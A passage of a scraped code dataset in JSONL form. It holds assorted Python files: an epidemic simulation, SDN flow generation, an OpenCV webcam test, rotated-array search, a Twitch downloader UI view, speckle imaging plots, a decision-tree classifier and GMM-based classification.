[-1,0.99,-1,1])\n# c1 = country('country1',red_tra, 200, 0, [-1,0.99,-1,1])\n# c2 = country('count2', red_tra, 200, 0.7, [1.01,3,-1,1])\n# c2 = country('count2', red_tra, 200, 0.95, [1.01,3,-1,1])\n# c2 = country('count2', area_res, 200, 0.95, [1.01,3,-1,1])\nc2 = country('count2', all, 200, 0.80, [1.01,3,-1,1])\n\ncountries = [c1, c2]\n\nExecute(update_world, 60)\n\nfor c in countries:\n\tc.plot_cases_vs_time()\n\n","repo_name":"moyasui/covidproject","sub_path":"Epidemiology-final.py","file_name":"Epidemiology-final.py","file_ext":"py","file_size_in_byte":12943,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"71197385447","text":"import random\nn_files = 20\nn_nodes = 14\nrandom.seed(10)\n\nfor i in range(n_files):\n with open(f\"./flows/flows{i}.txt\" , 'w') as f:\n n_flows = 3\n rsd = random.sample(range(0,14), n_flows*2)\n ct = 0\n ar = []\n for i in range(n_flows):\n st = random.randint(1,20)\n priority = random.randint(1,50)\n duration = random.randint(20,40)\n bw = random.randint(15,35)\n src = rsd[ct]\n dst = rsd[ct+1]\n ct += 2\n ar.append([st,priority,duration,bw,src,dst])\n \n ar.sort(key=lambda x : x[0])\n for i in ar:\n f.write(f'{i[0]},{i[1]},{i[2]},{i[3]},{i[4]},{i[5]}' + \"\\n\")\n","repo_name":"Manoj-312002/sdn","sub_path":"topo/genfllow.py","file_name":"genfllow.py","file_ext":"py","file_size_in_byte":706,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"27421775305","text":"import cv2\nimport numpy as np\n\ncam = cv2.VideoCapture(0)\n\nwhile True:\n __, frame = cam.read()\n cv2.imshow(\"Feed\", frame)\n k = cv2.waitKey(25)\n if k == ord('q'): \n break\n\ncam.release()\ncv2.destoryAllWindows()\n","repo_name":"HWU-Robo/pi-wars-workshops","sub_path":"Sensors/Video/cvTest.py","file_name":"cvTest.py","file_ext":"py","file_size_in_byte":227,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"73657642088","text":"\"\"\"\nThis problem was asked by Amazon.\n\nAn sorted array of integers was rotated an unknown number of times.\n\nGiven such an array, find the index of the element in the array in faster than linear time.\nIf the element doesn't exist in the array, return null.\n\nFor example, given the array [13, 18, 25, 2, 8, 10] and the element 8, return 4 (the index of 8 in the array).\n\nYou can assume all the integers in the array are unique.\n\"\"\"\n\n\ndef findElement(elements, target):\n left = 0\n right = len(elements) - 1\n # if elements[left] == element:\n # return left\n # if elements[right] == element:\n # return right\n while left <= right:\n mid = (left + right) // 2\n if elements[mid] == target:\n return mid\n if elements[mid] >= elements[left]:\n if target >= elements[left] and target <= elements[mid]:\n right = mid - 1\n else:\n left = mid + 1\n else:\n if target >= elements[mid] and target <= elements[right]:\n left = mid + 1\n else:\n right = mid - 1\n return None\n\n\nelements = [13, 18, 25, 2, 8, 10, 11, 12]\ntarget = 2\nans = findElement(elements, target)\nprint(ans)\n","repo_name":"anirudhsingla8/daily_coding_problem","sub_path":"daily_coding_problem_58.py","file_name":"daily_coding_problem_58.py","file_ext":"py","file_size_in_byte":1223,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"20053130934","text":"from Core.Ui import *\nfrom Services.Messages import Messages\nfrom Services import ContentManager\nfrom Services.Twitch.GQL import TwitchGQLAPI\nfrom Services.Twitch.GQL.TwitchGQLModels import Channel, Stream, Video, Clip\nfrom Services.Twitch.Playback import TwitchPlaybackGenerator\nfrom Download.DownloadInfo import DownloadInfo\nfrom Download.Downloader import TwitchDownloader\nfrom Download.Downloader.Core.StreamDownloader import StreamDownloader\nfrom Download.Downloader.Core.VideoDownloader import VideoDownloader\nfrom Download.Downloader.Core.ClipDownloader import ClipDownloader\nfrom Download import ScheduledDownloadPreset\nfrom Ui.Components.Widgets.UpdateTrackInfoDisplay import UpdateTrackInfoDisplay\n\n\nclass DownloaderView(QtWidgets.QWidget):\n resizedSignal = QtCore.pyqtSignal()\n\n def __init__(self, parent: QtWidgets.QWidget | None = None):\n super().__init__(parent=parent)\n self._ui = UiLoader.load(\"downloaderView\", self)\n self._ui.downloadInfoView = Utils.setPlaceholder(self._ui.downloadInfoView, Ui.DownloadInfoView(parent=self))\n self._ui.alertIcon = Utils.setSvgIcon(self._ui.alertIcon, Icons.ALERT_RED_ICON)\n self._ui.statusInfoButton.clicked.connect(self.showErrorInfo)\n self._updateTrackInfoDisplay = UpdateTrackInfoDisplay(target=self._ui.updateTrackInfo, parent=self)\n self._downloader: StreamDownloader | VideoDownloader | ClipDownloader | None = None\n self._exception: Exception | None = None\n self.setStatusVisible(False)\n\n def connectDownloader(self, downloader: StreamDownloader | VideoDownloader | ClipDownloader) -> None:\n self.disconnectDownloader()\n self._downloader = downloader\n self._ui.downloadInfoView.showDownloadInfo(self._downloader.downloadInfo)\n self._updateTrackInfoDisplay.connectDownloader(self._downloader)\n self._downloader.status.updated.connect(self._updateStatus)\n self._downloader.progress.updated.connect(self._updateProgress)\n self._downloader.finished.connect(self._downloadFinishHandler)\n self._updateStatus()\n self._updateProgress()\n if self._downloader.isFinished():\n self._downloadFinishHandler()\n self.setStatusVisible(True)\n\n def disconnectDownloader(self) -> None:\n if self._downloader != None:\n self._updateTrackInfoDisplay.disconnectDownloader()\n self._downloader.status.updated.disconnect(self._updateStatus)\n self._downloader.progress.updated.disconnect(self._updateProgress)\n self._downloader.finished.disconnect(self._downloadFinishHandler)\n self._downloader = None\n\n def setStatusVisible(self, visible: bool) -> None:\n self._ui.statusArea.setVisible(visible)\n self.resizedSignal.emit()\n\n def _updateStatus(self) -> None:\n if self._downloader.status.terminateState.isInProgress():\n self.showStatus(T(\"stopping\" if isinstance(self._downloader, StreamDownloader) else \"canceling\", ellipsis=True))\n elif not self._downloader.status.pauseState.isFalse():\n if self._downloader.status.pauseState.isInProgress():\n self.showStatus(T(\"pausing\", ellipsis=True))\n else:\n self.showAlert(T(\"paused\"))\n elif self._downloader.status.isPreparing():\n self.showStatus(T(\"preparing\", ellipsis=True))\n elif self._downloader.status.isDownloading():\n self.showStatus(T(\"live-downloading\" if isinstance(self._downloader, StreamDownloader) else \"downloading\", ellipsis=True))\n\n def _updateProgress(self) -> None:\n if self._downloader.status.isPreparing():\n self.showProgress(0)\n elif isinstance(self._downloader, StreamDownloader):\n self.showProgress(None, self._downloader.progress.size)\n elif isinstance(self._downloader, VideoDownloader):\n if self._downloader.status.isDownloading() and not self._downloader.status.pauseState.isTrue():\n if self._downloader.downloadInfo.isUpdateTrackEnabled() and self._downloader.status.getWaitingCount() != -1:\n self.showProgress(None, self._downloader.progress.size)\n else:\n self.showProgress(self._downloader.progress.fileProgress, self._downloader.progress.size)\n else:\n self.showProgress(self._downloader.progress.sizeProgress, self._downloader.progress.size)\n self._updateDurationInfo()\n\n def _updateDurationInfo(self) -> None:\n if isinstance(self._downloader, StreamDownloader):\n self._ui.downloadInfoView.updateDurationInfo(self._downloader.progress.milliseconds)\n elif isinstance(self._downloader, VideoDownloader):\n self._ui.downloadInfoView.updateDurationInfo(\n totalMilliseconds=int(self._downloader.downloadInfo.content.lengthSeconds * 1000),\n progressMilliseconds=self._downloader.progress.milliseconds,\n cropRangeMilliseconds=self._downloader.downloadInfo.getCropRangeMilliseconds()\n )\n elif isinstance(self._downloader, ClipDownloader):\n return\n self._ui.downloadInfoView.showMutedInfo(self._downloader.progress.mutedFiles, self._downloader.progress.mutedMilliseconds)\n self._ui.downloadInfoView.showSkippedInfo(self._downloader.progress.skippedFiles, self._downloader.progress.skippedMilliseconds)\n self._ui.downloadInfoView.showMissingInfo(self._downloader.progress.missingFiles, self._downloader.progress.missingMilliseconds)\n\n def _downloadFinishHandler(self) -> None:\n if self._downloader.status.terminateState.isTrue():\n if isinstance(self._downloader.status.getError(), Exceptions.AbortRequested):\n if isinstance(self._downloader, StreamDownloader):\n self.setStatusVisible(False)\n else:\n self.showAlert(T(\"download-canceled\"))\n else:\n self.showError(self._downloader.status.getError(), downloadAborted=True)\n else:\n self.setStatusVisible(False)\n\n def showStatus(self, status: str) -> None:\n self._ui.alertIcon.hide()\n self._ui.status.setText(status)\n self._ui.statusInfoButton.hide()\n self._ui.progressBar.clearState()\n\n def showProgress(self, progress: int | None, fileSize: str | None = None) -> None:\n if progress == None:\n self._ui.progressBar.setRange(0, 0)\n else:\n self._ui.progressBar.setRange(0, 100)\n self._ui.progressBar.setValue(progress)\n if fileSize == None:\n self._ui.fileSize.hide()\n else:\n self._ui.fileSize.setText(fileSize)\n self._ui.fileSize.show()\n\n def showAlert(self, text: str) -> None:\n self._ui.alertIcon.show()\n self._ui.status.setText(text)\n self._ui.statusInfoButton.hide()\n self._ui.progressBar.showWarning()\n self.showProgress(100)\n\n def showError(self, exception: Exception | None, downloadAborted: bool = False) -> None:\n self._exception = exception\n if self._exception != None:\n self._ui.alertIcon.show()\n reasonText = self._getErrorReason()\n self._ui.status.setText(f\"{T('download-aborted')} ({T(reasonText)})\" if downloadAborted else T(reasonText))\n self._ui.statusInfoButton.show()\n self._ui.progressBar.showError()\n self.showProgress(100)\n\n def showErrorInfo(self) -> None:\n description = self._getErrorDescription()\n if description == None:\n if isinstance(self._exception, Exceptions.FileSystemError):\n Utils.info(*Messages.INFO.FILE_SYSTEM_ERROR, parent=self)\n elif isinstance(self._exception, Exceptions.NetworkError):\n Utils.info(*Messages.INFO.NETWORK_ERROR, parent=self)\n elif isinstance(self._exception, Exceptions.ProcessError):\n Utils.info(\"process-error\", \"#Process exited unexpectedly.\\n\\nPossible Causes\\n\\n* Corruption of the original file\\n* Invalid crop range\\n* Too long or invalid filename or path\\n* Out of memory\\n* Out of storage capacity\\n* Lack of device performance\\n* Needs permission to perform this action\\n\\nIf the error persists, try Run as administrator.\", parent=self)\n elif isinstance(self._exception, TwitchGQLAPI.Exceptions.AuthorizationError):\n if App.Account.isLoggedIn():\n Utils.info(*Messages.INFO.AUTHENTICATION_ERROR, parent=self)\n else:\n Utils.info(*Messages.INFO.TEMPORARY_ERROR, parent=self)\n else:\n Utils.info(\"error\", \"#An error occurred while downloading.\", parent=self)\n else:\n Utils.info(\"unable-to-download\", description, contentTranslate=False, parent=self)\n\n def _getErrorReason(self) -> str:\n if isinstance(self._exception, Exceptions.FileSystemError):\n return \"system-error\"\n elif isinstance(self._exception, Exceptions.NetworkError):\n return \"network-error\"\n elif isinstance(self._exception, Exceptions.ProcessError):\n return \"process-error\"\n elif isinstance(self._exception, ContentManager.Exceptions.RestrictedContent):\n return \"restricted-content\"\n elif isinstance(self._exception, ScheduledDownloadPreset.Exceptions.PreferredResolutionNotFound):\n return \"preferred-resolution-not-found\"\n elif isinstance(self._exception, TwitchDownloader.Exceptions.DownloaderCreationDisabled):\n return \"disabled-feature\"\n else:\n return \"unexpected-error\"\n\n def _getErrorDescription(self) -> str | None:\n if isinstance(self._exception, TwitchPlaybackGenerator.Exceptions.Forbidden):\n if App.Account.isLoggedIn():\n return f\"{T('#Authentication of your account has been denied.')}\\n\\n{T('reason')}: {self._exception.reason}\"\n else:\n return f\"{T('#Authentication denied.')}\\n\\n{T('reason')}: {self._exception.reason}\"\n elif isinstance(self._exception, TwitchPlaybackGenerator.Exceptions.GeoBlock):\n return f\"{T('#This content is not available in your region.')}\\n\\n{T('reason')}: {self._exception.reason}\"\n elif isinstance(self._exception, TwitchPlaybackGenerator.Exceptions.ChannelNotFound):\n return T(\"#Channel not found. Deleted or temporary error.\")\n elif isinstance(self._exception, ContentManager.Exceptions.RestrictedContent):\n if self._exception.restrictionType == ContentManager.RestrictionType.CONTENT_TYPE:\n restrictionType = T(\"#Downloading {contentType} from this channel has been restricted by the streamer({channel})'s request or by the administrator.\", channel=self._exception.channel.displayName, contentType=T(self._exception.contentType))\n else:\n restrictionType = T(\"#This content has been restricted by the streamer({channel})'s request or by the administrator.\", channel=self._exception.channel.displayName)\n restrictionInfo = T(\"#To protect the rights of streamers, {appName} restricts downloads when a content restriction request is received.\", appName=Config.APP_NAME)\n message = f\"{restrictionType}\\n\\n{restrictionInfo}\"\n if self._exception.reason != None:\n message = f\"{message}\\n\\n[{T('reason')}]\\n{self._exception.reason}\"\n return message\n elif isinstance(self._exception, ScheduledDownloadPreset.Exceptions.PreferredResolutionNotFound):\n return T(\"#The preferred resolution was not found.\\nYou have disabled the download until a matching resolution is found.\")\n elif isinstance(self._exception, TwitchDownloader.Exceptions.DownloaderCreationDisabled):\n return T(\"#Unable to start a new download.\\nThis feature has been disabled.\")\n else:\n return None\n\n def updateContentInfo(self, content: Channel | Stream | Video | Clip | DownloadInfo | None, immediateRefresh: bool = True) -> None:\n if isinstance(content, DownloadInfo):\n self._ui.downloadInfoView.showDownloadInfo(content, immediateRefresh=immediateRefresh)\n else:\n self._ui.downloadInfoView.showContentInfo(content, immediateRefresh=immediateRefresh)\n if self._downloader != None:\n self._updateDurationInfo()","repo_name":"devhotteok/TwitchLink","sub_path":"Ui/DownloaderView.py","file_name":"DownloaderView.py","file_ext":"py","file_size_in_byte":12467,"program_lang":"python","lang":"en","doc_type":"code","stars":287,"dataset":"github-code","pt":"53"} +{"seq_id":"31589354537","text":"import os\nimport sys\nimport numpy as np\nimport warnings\nfrom astropy.io import fits\nfrom astropy.utils.exceptions import AstropyWarning\nimport matplotlib.pyplot as pl\nfrom matplotlib.colors import LogNorm\nfrom seaborn.cm import mako\nfrom mpl_toolkits.axes_grid1.inset_locator import inset_axes\nimport glob\nfrom matplotlib import rcParams\nrcParams[\"savefig.dpi\"] = 150\nrcParams[\"figure.dpi\"] = 150\nif sys.platform == 'linux':\n pl.rcParams['font.family'] = 'Liberation Sans'\nelif sys.platform == 'darwin':\n pl.rcParams['font.family'] = 'Arial'\n\nwarnings.simplefilter('ignore', AstropyWarning)\nwarnings.simplefilter('ignore', UserWarning)\n\n\ndef normalize_01(im):\n\n return (im - im.min())/(im.max() - im.min())\n\n\nclass Speckle:\n\n def __init__(self, name, data_dir, inst=\"NESSI\"):\n\n self.name = name\n self.data_dir = data_dir\n self.inst = inst\n if inst == \"NESSI\":\n self.blue_name = 'b'\n self.red_name = 'r'\n self.blue_wav = 562\n self.red_wav = 832\n self.skiprows = 19\n elif inst == \"DSSI\":\n self.blue_name = 'a'\n self.red_name = 'b'\n self.blue_wav = 692\n self.red_wav = 880\n self.skiprows = 33\n elif inst == \"Zorro\":\n self.blue_name = 'b'\n self.red_name = 'r'\n self.blue_wav = 562\n self.red_wav = 832\n self.skiprows = 29\n elif inst == \"Alopeke\":\n self.blue_name = '562'\n self.red_name = '832'\n self.blue_wav = 562\n self.red_wav = 832\n self.skiprows = 29\n\n self._load(name, data_dir)\n\n def _load(self, name, data_dir):\n\n print(\"Loading {} data\".format(name))\n\n fp = glob.glob(os.path.join(data_dir, '{}*{}.fits'.format(name, self.blue_name)))[0]\n hl = fits.open(fp)\n self._fits_b = hl\n self._im_b = normalize_01(hl[0].data)\n self._hdr_b = hl[0].header\n\n fp = glob.glob(os.path.join(data_dir, '{}*{}.fits'.format(name, self.red_name)))[0]\n hl = fits.open(fp)\n self._fits_r = hl\n self._im_r = normalize_01(hl[0].data)\n self._hdr_r = hl[0].header\n\n fp = glob.glob(os.path.join(data_dir, '{}*{}*.dat'.format(name, self.blue_name)))[0]\n self._cc_b = np.loadtxt(fp, skiprows=self.skiprows)\n\n fp = glob.glob(os.path.join(data_dir, '{}*{}*.dat'.format(name, self.red_name)))[0]\n self._cc_r = np.loadtxt(fp, skiprows=self.skiprows)\n\n print(\"Data taken on {}\".format(self.obs_date))\n\n\n @property\n def obs_date(self):\n return self._hdr_r['DATE-OBS']\n\n\n def plot(self, figsize=(5,3.5), title=None, fp=None, stretch=1, vrange=None, cmap=None, c1='#01cdfe', c2='#ff71ce'):\n\n # colors = ['navy', 'turquoise', 'darkorange']\n colors = [c1, c2]\n\n if vrange is None:\n vrange = 0.1, 99.9\n\n if cmap is None:\n cm = mako\n elif cmap == 'gray':\n cm = pl.cm.gray\n elif cmap == 'gray_r':\n cm = pl.cm.gray_r\n\n fontsize=30\n pl.style.use('seaborn-ticks')\n\n # rcParams['font.family'] = 'serif'\n rcParams['axes.facecolor'] = 'white'\n rcParams[\"xtick.direction\"] = 'in'\n rcParams[\"ytick.direction\"] = 'in'\n\n if title is None:\n title = self.name\n\n fig,ax = pl.subplots(1, 1, figsize=figsize)\n\n rho, theta = self._cc_b.T\n ax.plot(rho, theta, label=f'{self.blue_wav} nm', color=colors[0], lw=2)\n\n rho, theta = self._cc_r.T\n ax.plot(rho, theta, label=f'{self.red_wav} nm', color=colors[1], lw=2)\n ax.invert_yaxis()\n ax.xaxis.set_ticks_position('both')\n ax.yaxis.set_ticks_position('both')\n ax.minorticks_on()\n\n ax1 = inset_axes(ax, 4.4, 1.3, borderpad=2)\n vmin, vmax = np.percentile(self._im_b, vrange[0]), np.percentile(self._im_b, vrange[1])\n im = ax1.imshow(self._im_b, cmap=cm, norm=LogNorm(vmin=vmin, vmax=vmax), interpolation='none', origin='lower')\n ax1.xaxis.set_visible(False)\n ax1.yaxis.set_visible(False)\n ax1.set_title(f'{self.blue_wav} nm', fontsize=10)\n# pixscale = 0.0175649 # arcsec/pixel\n pixscale = self._hdr_b['PIXSCL']\n arcsec = int(round(1/pixscale))\n xl, yl = ax1.get_xlim(), ax1.get_ylim()\n xcoord = [xl[1]-1.3*arcsec, xl[1]-0.3*arcsec]\n ycoord = [yl[0]+0.07*np.diff(yl), yl[0]+0.07*np.diff(yl)]\n ax1.plot(xcoord, ycoord, color='white')\n if self.inst == \"NESSI\":\n ax1.text(xcoord[0]*0.98, ycoord[0]*1.2, '1 arcsec', color='white', fontsize=6)\n elif self.inst == \"DSSI\":\n ax1.text(xcoord[0]*1.08, ycoord[0]*1.2, '1 arcsec', color='white', fontsize=6)\n elif self.inst == \"Zorro\":\n ax1.text(xcoord[0]*1.12, ycoord[0]*1.2, '1 arcsec', color='white', fontsize=6)\n elif self.inst == \"Alopeke\":\n ax1.text(xcoord[0]*1.12, ycoord[0]*1.2, '1 arcsec', color='white', fontsize=6)\n\n ax2 = inset_axes(ax, 1.3, 1.3, borderpad=2)\n vmin, vmax = np.percentile(self._im_r, vrange[0]), np.percentile(self._im_r, vrange[1])\n im = ax2.imshow(self._im_r, cmap=cm, norm=LogNorm(vmin=vmin, vmax=vmax), interpolation='none', origin='lower')\n ax2.xaxis.set_visible(False)\n ax2.yaxis.set_visible(False)\n ax2.set_title(f'{self.red_wav} nm', fontsize=10)\n# pixscale = 0.0181887 # arcsec/pixel\n pixscale = self._hdr_r['PIXSCL']\n arcsec = int(round(1/pixscale))\n xl, yl = ax2.get_xlim(), ax2.get_ylim()\n xcoord = [xl[1]-1.3*arcsec, xl[1]-0.3*arcsec]\n ycoord = [yl[0]+0.07*np.diff(yl), yl[0]+0.07*np.diff(yl)]\n ax2.plot(xcoord, ycoord, color='white')\n if self.inst == \"NESSI\":\n ax2.text(xcoord[0]*0.98, ycoord[0]*1.2, '1 arcsec', color='white', fontsize=6)\n elif self.inst == \"DSSI\":\n ax2.text(xcoord[0]*1.08, ycoord[0]*1.2, '1 arcsec', color='white', fontsize=6)\n elif self.inst == \"Zorro\":\n ax2.text(xcoord[0]*1.12, ycoord[0]*1.2, '1 arcsec', color='white', fontsize=6)\n elif self.inst == \"Alopeke\":\n ax2.text(xcoord[0]*1.12, ycoord[0]*1.2, '1 arcsec', color='white', fontsize=6)\n\n yl = ax.get_ylim()\n ylim = (stretch * yl[0], yl[1])\n pl.setp(ax,\n title=title,\n xlabel='Separation [arcsec]',\n ylabel=r'$\\Delta$mag',\n xlim=(rho.min(), rho.max()),\n ylim=ylim)\n\n ax.legend(loc='lower left', frameon=False)\n\n if fp is None:\n fp = '{}_{}.png'.format(self.name, self.obs_date)\n\n fig.tight_layout()\n fig.savefig(fp, dpi=400)\n pl.close()\n\n print(\"Wrote file: {}\".format(fp))\n\n\ndef cli():\n\n import sys\n import time\n tick = time.time()\n\n import argparse\n\n parser = argparse.ArgumentParser(description=\"Plot speckle imaging data\")\n parser.add_argument('-i', '--id', help='ID', type=str, default=None)\n parser.add_argument('-d', '--data_dir', help='Directory containing the data products',\n type=str, default='.')\n parser.add_argument('-s', '--stretch', help='y-axis stretch factor (default=1)', type=float, default=1)\n parser.add_argument('-n', '--name', help='Target name', type=str, default=None)\n parser.add_argument('-v', '--vrange', help='Log stretch vrange', type=str, default=None)\n parser.add_argument('-c', '--cmap', help='Color map name', type=str, default=None)\n parser.add_argument('-f', '--figsize', help='Figure size (comma-separated)', type=str, default='5,3.5')\n parser.add_argument('--inst', help='Instrument name', type=str, default='NESSI')\n args = parser.parse_args()\n\n if args.id is None:\n sys.exit('Must supply ID')\n\n id_ = args.id\n data_dir = args.data_dir\n stretch = args.stretch\n name = args.name\n vrange = args.vrange\n cmap = args.cmap\n inst = args.inst\n figsize = [float(i) for i in args.figsize.split(',')]\n\n if vrange is not None:\n vrange = list(map(float,vrange.split(',')))\n\n spkl = Speckle(id_, data_dir, inst=inst)\n spkl.plot(figsize=figsize, title=name, stretch=stretch, vrange=vrange, cmap=cmap)\n\n print(\"Script executed in {0:.1f} seconds\\n\".format(time.time() - tick))\n","repo_name":"john-livingston/speckle","sub_path":"speckle/speckle.py","file_name":"speckle.py","file_ext":"py","file_size_in_byte":8352,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"44885384315","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# In[77]:\n\n\nimport numpy as np\nimport pandas as pd\nimport sys\n\n\n# In[79]:\n\n\nclass Node:\n def __init__(self):\n self.label = None\n self.best_cond = None\n self.split_value = None\n self.left = None\n self.right = None\n\n\n# In[75]:\n\n\nclass tree:\n def __init__(self,tree_structure):\n self.i = 0\n self.tree_structure = tree_structure\n self.root = self.tree_growth()\n \n def tree_growth(self):\n if(self.tree_structure[self.i,0] == -2):\n leaf = Node()\n leaf.label = self.tree_structure[self.i,1]\n self.i += 1\n return leaf\n else:\n root = Node()\n root.best_cond = self.tree_structure[self.i,0]\n root.split_value = self.tree_structure[self.i,1]\n self.i += 1\n root.left = self.tree_growth()\n root.right = self.tree_growth()\n return root\n \n def predict(self,testX):\n predicted_labels=[]\n for img in testX:\n checking_node = self.root\n while checking_node.label == None:\n if img[int(checking_node.best_cond)] < checking_node.split_value:\n checking_node = checking_node.left\n else:\n checking_node = checking_node.right\n predicted_labels.append(checking_node.label)\n return np.array(predicted_labels)\n \n\n\n# In[80]:\n\n\ndef main(model_file,test_file,prediction):\n tree_structure = np.loadtxt(model_file,delimiter=\",\")\n test_data = pd.read_csv(test_file,header=None).values\n testX = test_data[:,1:]\n testy = test_data[:,0]\n \n new_tree = tree(tree_structure)\n predicted_labels = new_tree.predict(testX)\n outcome = []\n for truth,predict in zip(testy,predicted_labels):\n outcome.append((truth,predict))\n outcome=np.array(outcome,dtype=int)\n np.savetxt(prediction,outcome,delimiter=\",\", fmt=\"%d\")\n\nif __name__ == '__main__':\n model_file = sys.argv[1]\n test_file = sys.argv[2]\n prediction = sys.argv[3]\n main(model_file,test_file,prediction)\n\n\n# In[ ]:\n\n\n\n\n","repo_name":"nnnnnnnnt/Course-HWs-Projects","sub_path":"CSCI 5523 18Fall/DecisionTreeClassifier/dtclassify.py","file_name":"dtclassify.py","file_ext":"py","file_size_in_byte":2160,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"7546024356","text":"#encapsulation\n#python public, private, protected variables\n\nclass myCapsule:\n def __init__(self):\n self.a = 10 #a = public\n self._b = 20 #b = partially private, but convention, can be accessed\n self.__c = 30 #c = private, restricted \n def public_method(self):\n print(self.__c)\n print(\"Hi from public method\")\n self.__private_method() #now you can access\n\n def __private_method(self):\n print(\"Hello from private method\") #can't be used outside the class \n\n\n\n\n\ncapsule1 = myCapsule()\n\nprint(capsule1.a) #will print\nprint(capsule1._b) #will print\n#print(capsule1.__c) #won't print\n\ncapsule1.public_method() # now c can be printed","repo_name":"TriptoAfsin/Tripto-s-Python-3-Basics","sub_path":"4(OOP)/encaplusation/privateMethod.py","file_name":"privateMethod.py","file_ext":"py","file_size_in_byte":697,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"22154238758","text":"from random import random\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom scipy.stats import multivariate_normal\nimport pandas as pd\nfrom tqdm import tqdm\nfrom sklearn.mixture import GaussianMixture as GMM\ndef sample_distribution(n, p0, p1):\n\n N0 = 0\n N1 = 0\n for i in range(n):\n if random() < p0:\n N0 = N0 + 1\n else:\n N1 = N1 + 1\n return (N0, N1)\n\ndef generate_gaussian_samples(num_sample, w, mu, cov):\n if len(w) > 1:\n no_gaussian_samples = sample_distribution(num_sample, w[0], w[1])\n else:\n no_gaussian_samples = tuple([num_sample])\n datapoints = list()\n for i in range(len(no_gaussian_samples)):\n if len(datapoints) == 0:\n datapoints = np.random.multivariate_normal(mu[i], cov[i], no_gaussian_samples[i])\n else:\n datapoints = np.append(datapoints,np.random.multivariate_normal(mu[i], cov[i],no_gaussian_samples[i]),axis=0,)\n return datapoints\ndef plot_datapoints_scatter(datapoints, labels, xlabel, ylabel, title):\n n0 = calculate_no_labels(labels, 0)\n print(n0)\n n1 = len(datapoints) - n0\n print(n1)\n plt.scatter(datapoints[:n0, 0], datapoints[:n0, 1], c='b', label='class 0')\n plt.scatter(datapoints[n0:, 0], datapoints[n0:, 1], c='r', label='class 1')\n plt.title(title)\n plt.legend()\n plt.xlabel(xlabel)\n plt.ylabel(ylabel)\ndef plot_contours(data, means, covs, title):\n \"\"\"visualize the gaussian components over the data\"\"\"\n plt.figure()\n plt.plot(data[:, 0], data[:, 1], 'ko')\n delta = 0.025\n k = means.shape[0]\n x = np.arange(-4.0, 10.0, delta)\n y = np.arange(-4.0, 10.0, delta)\n x_grid, y_grid = np.meshgrid(x, y)\n coordinates = np.array([x_grid.ravel(), y_grid.ravel()]).T\n col = ['green', 'red', 'indigo']\n for i in range(k):\n mean = means[i]\n cov = covs[i]\n z_grid = multivariate_normal(mean,\n cov).pdf(coordinates).reshape(x_grid.shape)\n plt.contour(x_grid, y_grid, z_grid, colors=col[i])\n plt.title(title)\n plt.tight_layout()\ndef calculate_discriminant(datapoints, mu0, w0, cov0, mu1, cov1):\n data_discriminant = list()\n for i in tqdm(range(len(datapoints)), total=len(datapoints), desc=\"calcdata_discriminant\"):\n val = np.log(multivariate_normal.pdf(datapoints[i], mu1[0], cov1[0])/ (w0[0] * multivariate_normal.pdf(datapoints[i], mu0[0], cov0[0])+ w0[1] * multivariate_normal.pdf(datapoints[i], mu0[1], cov0[1])))\n data_discriminant.append(val)\n return data_discriminant\ndef data_points_labels_preproc(data_points, data_labels):\n data_labels = np.append(np.array([data_labels]), np.array([np.zeros(len(data_labels))]), axis=0)\n data_points = np.append(np.array([data_points[:, 0]]), np.array([data_points[:, 1]]), axis=0)\n return (data_points, data_labels)\ndef hit_cls(data_discriminant, data_labels):\n false_positive = list()\n true_positive = list()\n gamma_values = list()\n prob_error = list()\n no_0_labels = calculate_no_labels(data_labels=data_labels, label_value=0)\n no_1_labels = calculate_no_labels(data_labels=data_labels, label_value=1)\n data_discriminant_label0 = data_discriminant[0:no_0_labels]\n data_discriminant_label1 = data_discriminant[no_0_labels:]\n for i in tqdm(sorted(data_discriminant), total=len(data_discriminant), desc=\"hitclassifier\"):\n fp = len([j for j in data_discriminant_label0 if j >= i]) / no_0_labels\n tp = len([j for j in data_discriminant_label1 if j >= i]) / no_1_labels\n false_positive.append(fp)\n true_positive.append(tp)\n gamma_values.append(i)\n prob_error.append(fp * p0 + (1 - tp) * p1)\n return false_positive, true_positive, gamma_values, prob_error\ndef calculate_no_labels(data_labels, label_value):\n count = 0\n for i in data_labels:\n if i == label_value:\n count += 1\n return count\ndef find_estimated_params(train_data_points, train_data_labels):\n n0 = calculate_no_labels(data_labels=train_data_labels, label_value=0)\n GMMmodel = GMM(n_components=2, max_iter=100, tol=1e-3,covariance_type='full')\n GMMmodel.fit(train_data_points[0:n0])\n GMMmodel2 = GMM(n_components=1, max_iter=100, tol=1e-3,covariance_type='full')\n GMMmodel2.fit(train_data_points[n0:])\n return GMMmodel, GMMmodel2\ndef find_theta(train_data, alpha, iterations, train_labels, test_data, type_='l'):\n if type_ == 'l':\n z = np.c_[np.ones((train_data.shape[1])), train_data.T].T\n w = np.zeros((3, 1))\n else:\n z = np.c_[np.ones((train_data.shape[1])),train_data[0],train_data[1],train_data[0] * train_data[0],train_data[0] * train_data[1],train_data[1] * train_data[1],].T\n w = np.zeros((6, 1))\n for i in range(iterations):\n h = 1 / (1 + np.exp(-(np.dot(w.T, z))))\n cost_gradient = (1 / float(z.shape[1])) * np.dot(z, (h - train_labels[0]).T)\n w = w - alpha * cost_gradient\n print(w)\n if type_ == 'l':\n z = np.c_[np.ones((test_data.shape[1])), test_data.T].T\n else:\n z = np.c_[np.ones((test_data.shape[1])),test_data[0],test_data[1],test_data[0] * test_data[0],test_data[0] * test_data[1],test_data[1] * test_data[1],].T\n decisions = np.zeros((1, test_data.shape[1]))\n h = 1 / (1 + np.exp(-(np.dot(w.T, z))))\n decisions[0, :] = (h[0, :] >= 0.5).astype(int)\n return (w, decisions)\ndef plot_boundary(labels, W, flag, datapoints):\n X = datapoints\n x00 = [i for i in range(labels.shape[1]) if (labels[0, i] == 0 and labels[1, i] == 0)]\n x01 = [i for i in range(labels.shape[1]) if 